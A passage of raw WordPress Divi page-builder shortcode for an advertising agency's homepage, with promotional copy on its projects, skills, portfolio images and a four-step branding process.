box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"creative advertising agency in Delhi\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"packaging design by what the hell\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"digital agency\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"creative agency\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"packaging design creative advertising agency\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"creative marketing agency.\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"Creative graphic designing\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"best creative agency\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||92px|||\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" custom_margin=\"40px||59px|||\" custom_margin_tablet=\"||0px||false|false\" custom_margin_phone=\"3px||0px||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"30px||0px||false|false\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" padding_1_tablet=\"\" padding_1_phone=\"0px|||10%|false|false\" padding_1_last_edited=\"on|phone\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" 